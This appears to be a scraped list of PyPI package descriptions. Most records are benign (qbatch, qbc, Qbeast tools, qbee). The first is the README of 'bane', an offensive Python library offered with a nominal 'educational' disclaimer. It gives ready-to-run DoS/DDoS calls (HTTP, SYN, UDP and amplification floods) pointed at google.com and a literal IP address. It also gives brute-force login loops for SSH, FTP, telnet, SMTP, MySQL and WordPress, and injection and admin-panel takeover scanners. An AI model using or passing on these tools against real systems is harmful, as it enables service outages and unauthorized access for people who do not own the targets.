-:+++/- \n `.-::--` \n `INTRODUCTION:This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing) and even more ;)SPECIAL SPEECH:this is dedicated to my mentor: Zachary Barker (https://www.facebook.com/zachary.barker.5439), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:-S0u1 (https://www.facebook.com/S0u1.HLoTW) : programmer and blackhat.-Vince (https://www.facebook.com/vincelinux) : Linux and hardware expert, social engeneering and programmer.-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.-Jen Hill.in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)now let's start some tutorials, shall we?TUTORIALS:I-INSTALLING THE LIBRARY AND IMPORTING:you can use pip to do that:pip install baneor you can clone the project's link then run setup.pygit clonehttps://github.com/AlaBouali/banecd banepython setup.py installto import it you just do:import baneNOTES:-you need to install \"expect\" on linux or mac-for windows' users you can't use: bane.ssh1() and bane.telnet1() because they depend on pexpect and it need expect package to work, which can't be installed on windows-termux's users can't use this library cuz some module can't be installed, so it's pointless :(II-USAGE:this module have many incredible, useful and easy use functions that can be implemented in any project that is related to Web Application's Security.Vulnerabilities:default parameters:logs=True (print the test's result on the screen, set to False to not display).returning=False (return a value indicating the success (1/True) or fail (0/False) of the test).timeout: timeout value.proxy: same way as you use \"proxies\" parameters in requests.1-SQL-Injection:(useful link: https://www.acunetix.com/websitesecurity/sql-injection2/ )let's start with a simple SQL Injection testing. there are some techniques that can tell us if the web application is vulnerable to SQL-Injection or not, there is:-Error Based.-boolean based.-time based.here we have functions that can determinate whether the web application is vulnerable to SQL-Injection or not using the mentioned techniques.bane.sqlieb('http://example.com/index.php?id=5')#testingfor Error Based SQLIbane.sqlitb('http://example.com/index.php?id=5')#testingfor Time Based SQLIbane.sqlibb('http://example.com/index.php?id=5')#testingfor Boolean Based SQLIt\nhey return only 2 possible results:False: the target is not vulnerable.True: the target is vulnerable.2-XSS:(useful link: https://www.acunetix.com/vulnerabilities/web/cross-site-scripting/ )Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.here we have a function to get all html inputs in any webpage and test each input one by one against this attack with both: GET and POST methods.bane.xss('https://xss-game.appspot.com/level1/frame')output:Getting parametersTest has startedPayload:parameter: query method: GET=> [+]Payload was foundparameter: query method: POST=> [-]Payload was not foundthere is a default payload which is used in case you didn't modify the \"payload\" parameter (set by default to: None) to any XSS payload.you can set differnet xss payloads to test everytime with possibility to use a proxy.there is another functions to test with:bane.xssget('http://example.com/index.php',{parameter: xss-payload-here})bane.xsspost('http://example.com/index.php',{parameter: xss-payload-here})3-FI:(File Inclusion): (useful link:https://www.acunetix.com/vulnerabilities/web/file-inclusion/)we can test a web application if it is vulnerable to FI using this function:bane.fi('http://example.com/index.php?file=page1.php')it returns (in case the parameter \"returning\" set to: True) a dict that contains{ \"Status\" : status # ==>True if success or False is fail\n,\"Nullbyte\" : nullbyte # ==>True if \"nullbyte\" parameter is set to True,\"Link\" : r.url # ==> the result URL}4-PHP code injection:(useful link:https://www.acunetix.com/vulnerabilities/web/php-code-injection/)to test a web application against PHP code injection we can use those functions:bane.injectlink('http://example.com/index.php?id=2')if it returns:False: not vulnerableTrue: vulnerableyou can use another functions to do that as well:bane.getinject('http://example.com/index.php',param=parameter-here)bane.postinject('http://example.com/index.php',param=parameter-here)5-command injection:(useful link:https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013))OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.here we can test the web application against this type of vulnerabilities using those functions:bane.execlink('http://example.com/index.php?doc=1')bane.getexec('http://example.com/index.php',param=your_parameter_here)bane.postexec('http://example.com/index.php',param=your_parameter_here)5-forced browsing:(useful link:https://www.owasp.org/index.php/Forced_browsing)Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible.An attacker can use Brute Force techniques to search for unlinked contents in the domain directory, such as temporary directories and files, and old backup and configuration files. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.This attack is performed manually when the application index directories and pages are based on number generation or predictable values, or using automated tools for common files and directory names.This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.admin panel:we can access and enumerate some or all internal admin panel pages using this method and takeover the panel!!!bane.forcebrowsing('http://example.com/admin/' , ext=\"php\",timeout=10)orbane.forcebrowsing('http://example.com/admin/' , ext=\"asp\")also you can use a function here to find the site's admin login panel:bane.adminpanel('http://example.com/admin/' , ext=\"php\",timeout=7)the default extension is \"php\", you can change it as you like to: asp, aspxusing the parameter \"ext\".filemanager:we can bruteforce the path to a possible filemanager and takeover it using this technique:bane.filemanager('http://example.com')6-Slow DoS vulnerabilities:(useful link:https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/)high timeout value:bane.timeouttest('www.google.com',port=443)slow GET attack test:bane.slowgettest('www.google.com',port=80)slow POST attack test:bane.slowposttest('www.google.com',port=80)slow read attack test:bane.slowreadtest('www.google.com',port=80)connections per IP test:bane.connectionslimit('www.google.com',port=80)7-Bruteforce attacks:(useful link:https://www.acunetix.com/vulnerabilities/web/login-page-password-guessing-attack/)here we are doing a bruteforce attach against a target using a list of usernames and passwords, if the loin function returned True, then logins founds else it failed.FTP:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.ftp(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'SSH:here we have 2 different ways to logins to a ssh server:ssh1:(using pexpect module with \"spawn\" instead of \"pexssh\", which is more cleaver)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.ssh1(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'ssh2:(using paramiko module)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.ssh2(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'TELNET:here we have 2 different ways to logins to a telnet server:telnet1:(using pexpect module with \"spawn\" instead of \"pexssh\", which is more cleaver)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.telnet1(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'telnet2:(using telnetlib module)wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.telnet2(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'SMTP:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.smtp(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'MYSQL:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.mysql(\"example.com\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'ADMIN LOGIN:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.adminlogin(\"http://example.com/admin/login.php\",{'username':user,'password':pwd)==True:print'[+]Found'breakelse:print'[-]Failed'WORDPRESS ADMIN LOGIN:wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]for x in wordlist:user=x.split(\":\")[0]pwd=x.split(\":\")[1]print'\"[*]Trying:\",user,pwdif bane.wpadmin(\"http://example.com/\",username=user,password=pwd)==True:print'[+]Found'breakelse:print'[-]Failed'HYDRA TOOL:hydra is a famous tool that is widely used for bruteforce attacks. here is a python version of it in python based on the above functions.it takes the following parameters:proto:set by default to: \"ssh\", it can be set to: \"ftp\",\"ssh\",\"telnet\",\"smtp\",\"mysql\",\"wp\" (to bruteforce WP sites on HTTP protocol)p: target port, set by default to: 22wl: the list contains usernames and passwords seperated by \":\", ex: [\"admin:admin\",\"admin:12345\",\"root:root\"]wordlist=[\"admin:admin\",\"admin:12345\",\"root:root\"]bane.hydra(\"127.0.0.1\",proto=\"telnet\",p=23,wl=wordlist)DoS / DDoS:(useful link:https://en.wikipedia.org/wiki/Denial-of-service_attack)bane.hulk('www.google.com',threads=1000) #hulk attackbane.proxhulk('www.google.com',threads=1000) #hulk attack with http proxiesbane.slowloris('www.google.com',p=80,threads=50) #slowloris attackbane.xerxes('www.google.com',p=443,threads=500) #xerxes attackbane.httpflood('www.google.com',p=80,threads=1000) #http floodbane.lulzer('www.google.com',p=80,threads=1000) #http flood with proxiesbane.tcpflood('www.google.com',threads=1000) #tcp floodbane.udp('50.63.33.34',p=80) #udp floodbane.doser('https://www.google.com',threads=500)bane.proxdoser('https://www.google.com',threads=500)bane.torshammer('www.google.com',p=80,threads=1000)bane.slowread('www.google.com',p=80,threads=1000)bane.apachekiller('www.google.com',p=80,threads=500)bane.goldeneye('www.google.com',p=80,threads=1000)bane.medusa('www.google.com',p=80,threads=1000)bane.icmp('50.63.33.34',p=80,threads=100)bane.synflood('50.63.33.34',p=80,threads=100)bane.icmpstorm('50.63.33.34',p=80,threads=100)bane.land('50.63.33.34',p=80,threads=100)bane.udpstorm('50.63.33.34',p=80,threads=100)bane.blacknurse('50.63.33.34',p=80,threads=100)bane.dnsamplif('50.63.33.34',p=80,dnslist=[your_dns_servers_list_here],threads=100)bane.ntpamplif('50.63.33.34',p=80,dnslist=[your_ntp_servers_list_here],threads=100)bane.snmpamplif('50.63.33.34',p=80,dnslist=[your_snmp_servers_list_here],threads=100)"} +{"package": "qbank", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbar", "pacakge-description": "An easily-configurable status bar."} +{"package": "qbase", "pacakge-description": "No description available on PyPI."} +{"package": "qbase_beequants", "pacakge-description": "No description available on PyPI."} +{"package": "qbatch", "pacakge-description": "qbatchExecute shell command lines in parallel on Slurm, S(on) of Grid Engine (SGE),\nPBS/Torque clustersqbatch is a tool for executing commands in parallel across a compute cluster.\nIt takes as input a list ofcommands(shell command lines or executable\nscripts) in a file or piped toqbatch. The list of commands are divided into\narbitrarily sizedchunkswhich are submitted as jobs to the cluster either as\nindividual submissions or an array. Each job runs the commands in its chunk in\nparallel according tocores. Commands can also be run locally on systems\nwith no cluster capability via gnu-paralel.qbatchcan also be used within python using theqbatch.qbatchParserandqbatch.qbatchDriverfunctions.qbatchParserwill accept a list of\ncommand line options identical to the shell interface, parse, and submit jobs.\nTheqbatchDriverinterface will accept key-value pairs\ncorresponding to the outputs of the argument parser, and additionally, thetask_listoption, providing a list of strings of commands to run.Installation$pipinstallqbatchDependenciesqbatchrequires python (>2.7) andGNU Parallel.\nFor Torque/PBS and gridengine clusters,qbatchrequires theqsubandqstatcommands. For Slurm workload manager,qbatchrequires thesbatchandsqueuecommands.Environment variable defaultsqbatch supports several environment variables to customize defaults for your\nlocal system.$exportQBATCH_PPJ=12# requested processors per job$exportQBATCH_CHUNKSIZE=$QBATCH_PPJ# commands to run per job$exportQBATCH_CORES=$QBATCH_PPJ# commonds to run in parallel per job$exportQBATCH_NODES=1# number of compute nodes to request for the job, typically for MPI jobs$exportQBATCH_MEM=\"0\"# requested memory per job$exportQBATCH_MEMVARS=\"mem\"# memory request variable to set$exportQBATCH_SYSTEM=\"pbs\"# queuing system to use (\"pbs\", \"sge\",\"slurm\", or \"local\")$exportQBATCH_NODES=1# (PBS-only) nodes to request per job$exportQBATCH_SGE_PE=\"smp\"# (SGE-only) parallel environment name$exportQBATCH_QUEUE=\"1day\"# Name of submission queue$exportQBATCH_OPTIONS=\"\"# Arbitrary cluster options to embed in all jobs$exportQBATCH_SCRIPT_FOLDER=\".qbatch/\"# Location to generate jobfiles for submission$exportQBATCH_SHELL=\"/bin/sh\"# Shell to use to evaluate jobfileCommand line helpusage: qbatch [-h] [-w WALLTIME] [-c CHUNKSIZE] [-j CORES] [--ppj PPJ]\n [-N JOBNAME] [--mem MEM] [-q QUEUE] [-n] [-v] [--version]\n [--depend DEPEND] [-d WORKDIR] [--logdir LOGDIR] [-o OPTIONS]\n [--header HEADER] [--footer FOOTER] [--nodes NODES]\n [--sge-pe SGE_PE] [--memvars MEMVARS]\n [--pbs-nodes-spec PBS_NODES_SPEC] [-i]\n [-b {pbs,sge,slurm,local,container}] [--env {copied,batch,none}]\n [--shell SHELL]\n ...\n\nSubmits a list of commands to a queueing system. The list of commands can be\nbroken up into 'chunks' when submitted, so that the commands in each chunk run\nin parallel (using GNU parallel). The job script(s) generated by qbatch are\nstored in the folder .qbatch/\n\npositional arguments:\n command_file An input file containing a list of shell commands to\n be submitted, - to read the command list from stdin or\n -- followed by a single command\n\noptional arguments:\n -h, --help show this help message and exit\n -w WALLTIME, --walltime WALLTIME\n Maximum walltime for an array job element or\n individual job (default: None)\n -c CHUNKSIZE, --chunksize CHUNKSIZE\n Number of commands from the command list that are\n wrapped into each job (default: 1)\n -j CORES, --cores CORES\n Number of commands each job runs in parallel. If the\n chunk size (-c) is smaller than -j then only chunk\n size commands will run in parallel. This option can\n also be expressed as a percentage (e.g. 100%) of the\n total available cores (default: 1)\n --ppj PPJ Requested number of processors per job (aka ppn on\n PBS, slots on SGE, cpus per task on SLURM). Cores can\n be over subscribed if -j is larger than --ppj (useful\n to make use of hyper-threading on some systems)\n (default: 1)\n -N JOBNAME, --jobname JOBNAME\n Set job name (defaults to name of command file, or\n STDIN) (default: None)\n --mem MEM Memory required for each job (e.g. --mem 1G). This\n value will be set on each variable specified in\n --memvars. To not set any memory requirement, set this\n to 0 (default: 0)\n -q QUEUE, --queue QUEUE\n Name of queue to submit jobs to (defaults to no queue)\n (default: None)\n -n, --dryrun Dry run; Create jobfiles but do not submit or run any\n commands (default: False)\n -v, --verbose Verbose output (default: False)\n --version show program's version number and exit\n\nadvanced options:\n --depend DEPEND Wait for successful completion of job(s) with name\n matching given glob pattern or job id matching given\n job id(s) before starting (default: None)\n -d WORKDIR, --workdir WORKDIR\n Job working directory (default:\n current working directory)\n --logdir LOGDIR Directory to save store log files (default:\n {workdir}/logs)\n -o OPTIONS, --options OPTIONS\n Custom options passed directly to the queuing system\n (e.g --options \"-l vf=8G\". This option can be given\n multiple times (default: [])\n --header HEADER A line to insert verbatim at the start of the script,\n and will be run once per job. This option can be given\n multiple times (default: None)\n --footer FOOTER A line to insert verbatim at the end of the script,\n and will be run once per job. This option can be given\n multiple times (default: None)\n --nodes NODES (PBS and SLURM only) Nodes to request per job\n (default: 1)\n --sge-pe SGE_PE (SGE-only) The parallel environment to use if more\n than one processor per job is requested (default: smp)\n --memvars MEMVARS A comma-separated list of variables to set with the\n memory limit given by the --mem option (e.g.\n --memvars=h_vmem,vf) (default: mem)\n --pbs-nodes-spec PBS_NODES_SPEC\n (PBS-only) String to be inserted into nodes= line of\n job (default: None)\n -i, --individual Submit individual jobs instead of an array job\n (default: False)\n -b {pbs,sge,slurm,local,container}, --system {pbs,sge,slurm,local,container}\n The type of queueing system to use. 'pbs' and 'sge'\n both make calls to qsub to submit jobs. 'slurm' calls\n sbatch. 'local' runs the entire command list (without\n chunking) locally. 'container' creates a joblist and\n metadata file, to pass commands out of a container to\n a monitoring process for submission to a batch system.\n (default: local)\n --env {copied,batch,none}\n Determines how your environment is propagated when\n your job runs. \"copied\" records your environment\n settings in the job submission script, \"batch\" uses\n the cluster's mechanism for propagating your\n environment, and \"none\" does not propagate any\n environment variables. (default: copied)\n --shell SHELL Shell to use for spawning jobs and launching single\n commands (default: /bin/sh)Some examples:# Submit an array job from a list of commands (one per line)# Generates a job script in ./.qbatch/ and job logs appear in ./logs/\\# All defaults are inherited from QBATCH_* environment variables$qbatchcommands.txt# Submit a single command to the cluster$qbatch--echohello# Set the walltime for each job$qbatch-w3:00:00commands.txt# Run 24 commands per job$qbatch-c24commands.txt# Pack 24 commands per job, run 12 in parallel at a time$qbatch-c24-j12commands.txt# Start jobs after successful completion of existing jobs with names starting with \"stage1_\"$qbatch--afterok'stage1_*'commands.txt# Pipe a list of commands to qbatch$parallelechoprocess.sh{}:::*.dat|qbatch-# Run jobs locally with GNU Parallel, 12 commands in parallel$qbatch-blocal-j12commands.txt# Many options don't make sense locally: chunking, individual vs array, nodes,# ppj, highmem, and afterok are ignoredA python script example:# Submit jobs to a cluster using the QBATCH_* environment defaultsimportqbatchtask_list=['echo hello','echo hello2']qbatch.qbatchDriver(task_list=task_list)"} +{"package": "qbc", "pacakge-description": "qbc: a Python package for Query-by-Committee Active LearningQBC Active Learning is a method used to increase sample efficency in situations where there is a low quantity of data. This implementation provides an automated pipeline to train a model ensemble using QBC active learning with arbitrary base learners.Three methods from the literature (QBag,QBoost,ACTIVE-DECORATE), as well as one original approach (jackAL) based on the jackknife are implemented currently. Modifications and extensions to the articles are proposed and explained in the accompanying paper.Abstract:The field of active learning has many different approaches.\nThis work focuses on the Query-by-Committee (QbC) framework, which uses ensembling methods to find the best sample to query for a label.\nThree methods from the literature are reviewed and implemented: QBag, QBoost, and ACTIVE-DECORATE.\nQBag, which is based on the bagging resampling method, has the advantage of simplicity, but QBoost (based on AdaBoost) often gives a larger performance increase.\nACTIVE-DECORATE uses synthetic data to augment a sample of the training set.\nOnce an ensemble of classifiers is trained on the current corpus, the algorithm then queries for the next labeled sample by finding the maximum \u201cdisagreement\u201d of the models.\nThis is done via a variety of methods, including entropy and absolute divergence from the mean. Overall, the QbC method allows comparable or greater accuracy to a classifier trained on the whole dataset, but with a vastly reduced number of required samples.\nThis work summarizes multiple approaches in the literature to QbC via bagging and boosting, and additionally proposes a new QbC framework called jackAL based on the jackknife; this method offers an advantage over the others because it allows the model to maximize small quantities of data, which is often the case when active learning is required.\nA variation on the jackknife, jackknife-k is explored as well.\nAdditionally, all code is implemented in Python and made available as open-source software on GitHub.AuthorBenjamin PierceSourcesM. H. Quenouille, \u201cProblems in Plane Sampling,\u201d The Annals of Mathematical Statistics, vol. 20, no. 3, pp. 355\u2013375, Sep. 1949, publisher: Institute of Mathematical Statistics. [Online]. Available:https://projecteuclid.org/journals/annals-of-mathematical-statistics/volume-20/issue-3/Problems-in-Plane-Sampling/10.1214/aoms/1177729989.fullL. Breiman, \u201cBagging Predictors,\u201d Machine Learning, vol. 24, no. 2, pp. 123\u2013140, Aug. 1996.OnlineR. E. Schapire, \u201cThe strength of weak learnability,\u201d Machine Learning, vol. 5, no. 2, pp. 197\u2013227, Jun. 1990.OnlineS. Argamon-Engelson and I. Dagan, \u201cCommittee-Based Sample Selection for Probabilistic Classifiers,\u201d Journal of Artificial Intelligence Research, vol. 11, pp. 335\u2013360, Nov. 1999, arXiv:1106.0220 [Online(http://arxiv.org/abs/1106.0220)B. Settles, \u201cActive Learning Literature Survey,\u201d University of Wisconsin-Madison Department of Computer Sciences, Technical Report, 2009, accepted: 2012-03-15T17:23:56Z.OnlineN. Abe and H. Mamitsuka, \u201cQuery Learning Strategies Using Boosting and Bagging.\u201d Madison, Wisconsin, USA, Jan. 1998, pp. 1\u20139.R. L. Milidi \u0301u, D. Schwabe, and E. Motta, \u201cActive Learning with Bagging for NLP Tasks,\u201d in Advances in Computer Science, Engineering & Applications. Springer, 2012, pp. 141\u2013147.C. K \u0308orner and S. Wrobel, \u201cMulti-class Ensemble-Based Active Learning,\u201d in Machine Learning: ECML 2006, ser. Lecture Notes in Computer Science. Springer, 2006, pp. 687\u2013694.P. Melville and R. J. Mooney, \u201cCreating diversity in ensembles using artificial data,\u201d Information Fusion, vol. 6, no. 1, pp. 99\u2013111, Mar. 2005.Online\u2014\u2014, \u201cDiverse ensembles for active learning,\u201d in Proceedings of the twenty-first international conference on Machine learning, ser. ICML \u201904, New York, NY, USA, Jul. 2004, p. 74.OnlineC. F. J. Wu, \u201cJackknife, Bootstrap and Other Resampling Methods in Regression Analysis,\u201d The Annals of Statistics, vol. 14, no. 4, pp. 1261\u20131295, Dec. 1986, publisher: Institute of Mathematical Statistics. [Online](https://projecteuclid.org/journals/annals-of-statistics/volume-14/issue4/Jackknife-Bootstrap-and-Other-Resampling-Methods-in-Regression-Analysis/10.1214/aos/1176350142.full)LicenseMIT, seeLICENSEfor a copy of the license, oravalible online"} +{"package": "qbc-animal", "pacakge-description": "Recognition Image Animal"} +{"package": "qbc-bot", "pacakge-description": "Smart bot little ape."} +{"package": "qbc-box", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-emoji", "pacakge-description": "Generateing image using emoji."} +{"package": "qbc-face", "pacakge-description": "Face detection and analysis."} +{"package": "qbc-face-ps", "pacakge-description": "Face Control."} +{"package": "qbc-food", "pacakge-description": "To judge a food image or recognize a food image."} +{"package": "qbchemchef", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-idcard-ocr", "pacakge-description": "Recognize ID Card By Ocr."} +{"package": "qb-consul", "pacakge-description": "Introduce to qb-consulversion: 1.0.2how to install:pip install qb-consulIf you want to use it locally:from qb_consul import Consul\n\n\nhost = \"127.0.0.1\" # consul\u670d\u52a1\u5668\u7684ip\nport = 8500 # consul\u670d\u52a1\u5668\u5bf9\u5916\u7684\u7aef\u53e3\nconsul_client = Consul(host, port)\n\n# register service\nname = \"qbzz-server\"\nhost1 = \"127.0.0.1\"\nport1 = 8001\nservice_id = \"qbzz-server-%s\" % port1\nconsul_client.register_service(name, service_id, host1, port1)\n\n# get service\nmessage = consul_client.get_service('qbzz-server')\nhost = message[0]\nport = message[1]"} +{"package": "qb-core-all", "pacakge-description": "This is a core package for qb appqb app is a complete application that implements simple architectural concepts. Its goal to separate business logic from infrastructure.Core modules will contain only logic/code that captures business concepts.Infrastructure modules will implement infrastructure specific code.In this version, all core modules will be in a single package. Future versions will split core modules in a more granular scope to help implementers focus on specific modulessee documentation/packaging_concepts.md"} +{"package": "qbc-pminfo", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-qrcode", "pacakge-description": "generate a qrcode according input text"} +{"package": "qbc-speech", "pacakge-description": "Speech Recognition,voice2text,text2voice"} +{"package": "qbc-trans", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-weather", "pacakge-description": "Get the weather forecast for the next 15 days"} +{"package": "qbdiff", "pacakge-description": "\u2728 pyqbdiff \u2728The python binding forqbdiffinstallpipinstallqbdiffUsagefromqbdiffimportcompute,patch,version,errorold=b\"1234\"new_=b\"123456\"compute(old,new_,\"diff_tmp.bin\")withopen(\"diff_tmp.bin\",\"rb\")asf:diff=f.read()patch(old,diff,\"new.bin\")withopen(\"new.bin\",\"rb\")asf:newf=f.read()assertnew_==newfuseQBDIFF_USE_CFFIenv var to specify a backendPublic functionsQBERR_BADCKSUM:intQBERR_BADPATCH:intQBERR_IOERR:intQBERR_LZMAERR:intQBERR_NOMEM:intQBERR_OK:intQBERR_SAIS:intQBERR_TRUNCPATCH:intdefversion()->str:...deferror(code:int)->str:...defcompute(old:bytes,new_:bytes,diff_file:str)->int:...defpatch(old:bytes,patch_:bytes,new_file:str)->int:...BuildTwo env var is needed to build,LIBandINCLUDE.LIBis the path of liblzma.lib/liblzma.so,\nandINCLUDEis the directory oflzma.hgitsubmoduleupdate--init--recursive\npythonsetup.pysdistbdist_wheel--use-cython--use-cffi"} +{"package": "qbeast-cli", "pacakge-description": "Qbeast CLIA command line interface to interact with the Qbeast services.Quick StartInstall the CLIpipinstallqbeast-cliLogin to the Qbeast ServicesqbeastloginQbeast Expo commandsRegister a datasetqbeastexpocreate\"My Share\"\"Sales Data\"s3a://my-bucket/my/table/pathaccount_idShare the dataset with peopleqbeastexpoinvite\"My Share\"\"Alice\"alice@somewhere.comQbeast Curator commands\u2139\ufe0f You must be in the root of your project, where youringestion/andtransformation/directories are.You can also use--path \"/path/to/project/\"option.Manage your projects in the Qbeast Curator.# Create a projectqbeastcuratorprojectcreate-p\"project-name\"# List the projectsqbeastcuratorprojectlist# Get info about a projectqbeastcuratorprojectinfo-p\"project-name\"# Update a project's descriptionqbeastcuratorprojectupdate-p\"project-name\"-D\"new description\"# Delete a projectqbeastcuratorprojectdelete-p\"project-name\"Manage the Snapshots of a Project.# Create a snapshot of the project & upload it to the Curatorqbeastcuratorsnapshotcreate-p\"project-name\"--path/path/to/your/project# List the snapshots of a Projectqbeastcuratorsnapshotlist-p\"project-name\"# Get info about a Snapshotqbeastcuratorsnapshotinfo-p\"project-name\"-s\"snapshot-id\"# Delete a snapshotqbeastcuratorsnapshotdelete-p\"project-name\"-s\"snapshot-id\"Manage the Deployments of a Project.# Create a Deployment of a Snapshotqbeastcuratordeploymentcreate-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# List the Deployments of a Projectqbeastcuratordeploymentlist-p\"project-name\"# Get info about a Deploymentqbeastcuratordeploymentinfo-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# Delete a Deploymentqbeastcuratordeploymentdelete-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"Manage the Runs of a Project# Start a run of a Deploymentqbeastcuratorrunstart-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# List the Runs of a Deploymentqbeastcuratorrunlist-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# Get info about a Runqbeastcuratorruninfo-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\"# Delete a Runqbeastcuratorrundelete-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\"# Get the logs of a Runqbeastcuratorrunlogs-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\""} +{"package": "qbeast-sharing", "pacakge-description": "Qbeast SharingWarning: This project is an experimental extension to Delta Sharing!This project has been created by forking the official Delta Sharing repository in order to introduce sampling pushdown to the python client.Qbeast Sharingextends theDelta Sharingopen protocol and adds the capabilities of sampling large datasets. Delta Sharing has been designed for secure real-time exchange of large datasets, which enables secure data sharing across different computing platforms. It lets organizations share access to existingDelta LakeandApache Parquettables with other organizations, who can then directly read the table in Pandas, Apache Spark, or any other software that implements the open protocol.This is the Python client library for Delta Sharing, which lets you load shared tables aspandasDataFrames or asApache SparkDataFrames if running in PySpark with theApache Spark Connector library.Installation and UsageInstall usingpip install qbeast-sharing.To use the Python Connector, seethe project docsfor details.DocumentationThis README only contains basic information about the Qbeast Sharing Python Connector. Please readthe project documentationfor full usage details."} +{"package": "qbee", "pacakge-description": "QBeeOnline playgroundTutorial in Jupyter(Colab)QBee is a Python library for transforming systems of differential equations into a systems with quadratic right-rand side.InstallationPyPIpip install qbeeManualClone repository:https://github.com/AndreyBychkov/QBee.gitOr, if you want our bleeding edge version, clonehttps://github.com/AndreyBychkov/QBee/tree/devChange directory:cd QBeeInstall package:pip install .If you usepoetryyou can alternately install if withpoetry installWhat is quadratization?The problem ofquadratizationis, given a system of ODEs with polynomial right-hand side, reduce the system to a\nsystem with quadratic right-hand side by introducing as few new variables as possible. We will explain it using toy\nexample. Consider the system$$\n\\begin{cases}\nx_1' = x_1 x_2 \\\nx_2' = -x_1 x_2^3\n\\end{cases}\n$$An example of quadratization of this system will be a singular vector of new variables$$\n[y' = x_2 y - 2y^2]\n$$leading to the following ODE$$\ny' = x_2 y - 2y^2\n$$Thus, we attained the system with quadratic right-hand side$$\n\\begin{cases}\nx_1' = x_1 x_2 \\\nx_2 ' = -x^2 y \\\ny' = x_2 y - 2y^2\n\\end{cases}\n$$We used only one new variable, so we achieved anoptimalquadratization.Qbee usageQBee implements algorithms thattakesystem of ODEs with elementary functions right-hand side andreturnoptimal monomial quadratization- optimal quadratization constructed from monomial substitutions.We will demonstrate usage of QBee on the example below. Other interactive examples you can find\ninexamples section.1. Importing QBeeQBee relies on Sympy for a high-level API.importsympyasspfromqbeeimport*2. System definitionFor example, we will take theA1system fromSwischuk et al.'2020$$\n\\begin{cases}\nc_1' = -A \\exp(-E_a / (R_u T)) c_1 ^{0.2} c_2^{1.3} \\\nc_2 ' = 2c_1' \\\nc_3' = -c_1' \\\nc_4' = -2 c_1'\n\\end{cases}\n$$The parameters in the system areA, Ea and Ru, and the others are either state variables or inputs.\nSo, let's define them with the system in code:A,Ea,Ru=parameters(\"A, Ea, Ru\")c1,c2,c3,c4,T=functions(\"c1, c2, c3, c4, T\")eq1=-A*sp.exp(-Ea/(Ru*T))*c1**0.2*c2**1.3system=[(c1,eq1),(c2,2*eq1),(c3,-eq1),(c4,-2*eq1)]3. Polynomialization and QuadratizationWhen we work with ODEs with the right-hand side being a general continuous function,\nwe 